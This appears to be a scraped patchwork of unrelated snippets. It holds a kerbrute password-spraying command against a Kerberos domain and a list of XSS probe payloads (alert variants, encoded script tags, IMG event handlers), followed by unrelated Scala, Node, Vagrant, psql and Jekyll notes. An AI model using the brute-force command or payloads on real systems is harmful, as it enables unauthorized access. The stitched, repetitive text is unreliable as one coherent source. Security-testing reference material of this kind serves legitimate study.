With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
// How many ways can you alert(document.domain)? | |
// Comment with more ways and I'll add them :) | |
// I already know about the JSFuck way, but it's too long to add (: | |
// Direct invocation | |
alert(document.domain); | |
(alert)(document.domain); | |
al\u0065rt(document.domain); | |
al\u{65}rt(document.domain); | |
window['alert'](document.domain); |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
Copyright © 2016-2018 Fantasyland Institute of Learning. All rights reserved.
A function is a mapping from one set, called a domain, to another set, called the codomain. A function associates every element in the domain with exactly one element in the codomain. In Scala, both domain and codomain are types.
val square : Int => Int = x => x * x
Node is a program (usually run from the command line) which executes JavaScript, and comes with a built-in library for writing network and filesystem code. Node is built on V8, the same JavaScript VM used in the Chrome browser. Instead of being wrapped with a GUI and web browser features like the DOM, node wraps V8 to expose lower-level operating system APIs. Some modules that come with node include: http
, fs
(filesystem), crypto
(cryptography), and lots more.
Modules are chunks of code you can 'require' and then use. Today we'll use the http
module, like so:
var http = require('http')
Typing vagrant
from the command line will display a list of all available commands.
Be sure that you are in the same directory as the Vagrantfile when running these commands!
vagrant init
-- Initialize Vagrant with a Vagrantfile and ./.vagrant directory, using no specified base image. Before you can do vagrant up, you'll need to specify a base image in the Vagrantfile.vagrant init <boxpath>
-- Initialize Vagrant with a specific box. To find a box, go to the public Vagrant box catalog. When you find one you like, just replace it's name with boxpath. For example, vagrant init ubuntu/trusty64
.vagrant up
-- starts vagrant environment (also provisions only on the FIRST vagrant up)Magic words:
psql -U postgres
Some interesting flags (to see all, use -h
or --help
depending on your psql version):
-E
: will describe the underlaying queries of the \
commands (cool for learning!)-l
: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)A list of the most common functionalities in Jekyll (Liquid). You can use Jekyll with GitHub Pages, just make sure you are using the proper version.
Running a local server for testing purposes: